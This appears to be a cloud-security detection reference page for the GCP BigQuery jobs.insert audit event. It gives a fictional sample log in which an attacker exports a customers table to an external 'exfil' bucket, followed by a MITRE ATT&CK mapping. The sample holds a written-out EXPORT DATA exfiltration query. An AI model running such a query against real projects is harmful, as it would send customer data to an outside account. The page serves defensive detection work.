Skip to content

bigquery.jobs.insert

GCP

bigquery.jobs.insert

service: GCP - BigQuery
techniques:

Event

Creates and submits a BigQuery job (query, load, export, or copy) that accesses or transforms data in BigQuery datasets.

Security Context

  • Accessing cloud storage objects can expose sensitive data including backups, configuration files, application data, and customer information.
  • Transferring data to external cloud accounts or regions can bypass network-based data loss prevention controls and exfiltrate large volumes of data.

Log Source

Cloud Audit Logs

Sample Event

Adversarial. Draco — having pivoted via an impersonated occamy-pipeline@ token from the prior GenerateAccessToken event — submits an EXPORT DATA query against the fantasticlogs-prod:occamy_events.customers table, writing the result as Parquet to a Cloud Storage bucket in his external project (gs://draco-exfil-bucket-666/). This is the canonical T1530 + T1537 BigQuery exfil pattern.

{
"protoPayload": {
"@type": "type.googleapis.com/google.cloud.audit.AuditLog",
"status": {},
"authenticationInfo": {
"principalEmail": "occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com",
"principalSubject": "serviceAccount:occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com",
"serviceAccountDelegationInfo": [
{
"firstPartyPrincipal": {
"principalEmail": "draco@fantasticlogs.cloud"
}
}
]
},
"requestMetadata": {
"callerIp": "203.0.113.66",
"callerSuppliedUserAgent": "google-cloud-sdk gcloud/465.0.0 command/gcloud.alpha.bq.query invocation-id/90000000000000000000001111101000 environment/None environment-version/None client-os/LINUX client-os-ver/(5,15,0) client-pltf-arch/x86_64 interactive/False from-script/False python/3.11.6 term/xterm-256color (Linux 5.15.0-1052-aws),gzip(gfe)",
"requestAttributes": {
"time": "2026-04-15T17:02:11.123456789Z",
"auth": {}
},
"destinationAttributes": {}
},
"serviceName": "bigquery.googleapis.com",
"methodName": "google.cloud.bigquery.v2.JobService.InsertJob",
"authorizationInfo": [
{
"resource": "projects/fantasticlogs-prod",
"permission": "bigquery.jobs.create",
"granted": true,
"resourceAttributes": {}
},
{
"resource": "projects/fantasticlogs-prod/datasets/occamy_events/tables/customers",
"permission": "bigquery.tables.export",
"granted": true,
"resourceAttributes": {}
}
],
"resourceName": "projects/fantasticlogs-prod/jobs/bquxjob_occamy_001111101000",
"metadata": {
"@type": "type.googleapis.com/google.cloud.audit.BigQueryAuditMetadata",
"jobChange": {
"before": "PENDING",
"after": "RUNNING",
"job": {
"jobName": "projects/fantasticlogs-prod/jobs/bquxjob_occamy_001111101000",
"jobConfig": {
"type": "QUERY",
"queryConfig": {
"query": "EXPORT DATA OPTIONS (uri = 'gs://draco-exfil-bucket-666/customers-*.parquet', format = 'PARQUET', overwrite = true) AS SELECT * FROM `fantasticlogs-prod.occamy_events.customers`",
"queryPriority": "QUERY_INTERACTIVE",
"statementType": "EXPORT_DATA"
}
},
"jobStatus": {
"jobState": "RUNNING"
},
"jobStats": {
"createTime": "2026-04-15T17:02:11.050000000Z",
"startTime": "2026-04-15T17:02:11.118000000Z",
"parentJobName": ""
}
}
}
}
},
"insertId": "evt001111101000",
"resource": {
"type": "bigquery_project",
"labels": {
"project_id": "fantasticlogs-prod",
"location": "us-central1"
}
},
"timestamp": "2026-04-15T17:02:11.098765432Z",
"severity": "INFO",
"logName": "projects/fantasticlogs-prod/logs/cloudaudit.googleapis.com%2Fdata_access",
"receiveTimestamp": "2026-04-15T17:02:11.456789012Z"
}

MITRE ATT&CK Mapping

Tactics: Collection Exfiltration

Techniques:
  • T1530 — Data from Cloud Storage — Adversaries may access data from cloud storage.
  • T1537 — Transfer Data to Cloud Account — Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.